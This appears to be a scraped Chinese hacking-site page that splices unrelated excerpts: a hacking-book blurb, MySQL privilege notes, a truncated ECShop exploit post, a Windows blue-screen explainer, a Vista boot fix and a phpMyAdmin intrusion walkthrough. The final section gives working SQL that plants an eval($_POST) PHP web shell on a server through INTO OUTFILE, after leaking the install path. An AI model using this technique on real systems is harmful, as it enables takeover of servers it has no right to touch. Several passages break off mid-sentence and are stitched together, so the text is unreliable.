书名：《Visual Basic黑客编程揭秘与防范》
特点：市面上第一本用VB编程实现防范黑客
能编写出属于黑客自己的黑客攻防软件一直是很多黑客爱好者梦寐以求的。然而由于各种编程技术的门槛较高，加之很少能找到相关的学习资料和具体技术细节，很多安全爱好者只能叹息黑客编程技术遥不可及。
作        者：王洪 张博
博客地址：www.wanghong.org
定       价：估价35元

MySQL权限
一．权限表
mysql数据库中的3个权限表：user 、db、 host
权限表的存取过程是：
1)先从user表中的host、 user、 password这3个字段中判断连接的IP、用户名、密码是否存在表中，存在则通过身份验证；
2)通过权限验证，进行权限分配时，按照user?db?tables_priv?columns_priv的顺序进行分配。即先检查全局权限表 user，如果user中对应的权限为Y，则此用户对所有数据库的权限都为Y，将不再检查db, tables_priv,columns_priv；如果为N，则到db表中检查此用户对应的具体数据库，并得到db中为Y的权限；

作者：oldjun

我很少关心之类的漏洞，已经很少拿站了，遇到DZ更加只是路过，也没去过多关心DZ的漏洞或者去研究代码；前不久论坛被人留下一个shell，害我检查半天，不过既然遇到了，那就公布出来方便大家。

我先声明：
1.这个不是我首发，很多牛牛很早之前就发现了，但没人公布，ring04h牛那貌似有个：

关于这个漏洞的介绍我是在鬼仔's Blog上发现的,关于漏洞的介绍请参看http://huaidan.org/archives/2946.html
下面是我的本机测试过程。我的php环境是用AppServ搭建的，从官方下载ECShop_V2.6.1_GBK_build109208（貌似官方还没出补丁也没有更新），安装好程序，本机的访问地址是http://127.0.0.1/ecshop/,把网上给出的代码
“
#!/usr/bin/php
<?php

print_r('
+-------------------------------

人有的时候都会闹情绪，更何况是机器呢。Windows有时候也会跟我们闹闹情绪，小则是“应用程序遇到问题需要关闭”，搞不好还可能给您脸色看看。但是，这脸色可不是红的白的，而是一张“蓝脸”，您见过吗？首先，我们介绍以下三个重要的问题：

一、到底什么是“蓝脸”？

这里指的就是大家经常称之为“蓝屏”、“系统崩溃”之类的东西，外国人又叫它BSOD(Blue Screen of Death)。从专业的角度讲，这一术语被定义为“是指当Microsoft Windows崩溃或停止执

最近很多人提到vista下安装老版本操作系统（XP/2000/98/ME等）后无法进入vista的问题，这是由于老版本的操作系统无法识别vista造成的。网上流传着很多解决办法，可是都很复杂，工程量大，这里给出简单的解决办法。　　

具体解决方法：　　

1、软件准备：　　

.NET Framework 2.0 http://download.pchome.net/development/developtools/translater/21850.html850.html

vistaBootPRO 3.1

1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.

----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
Drop TABLE IF EXISTS a;
----end code---

4.如果没什么意外.对应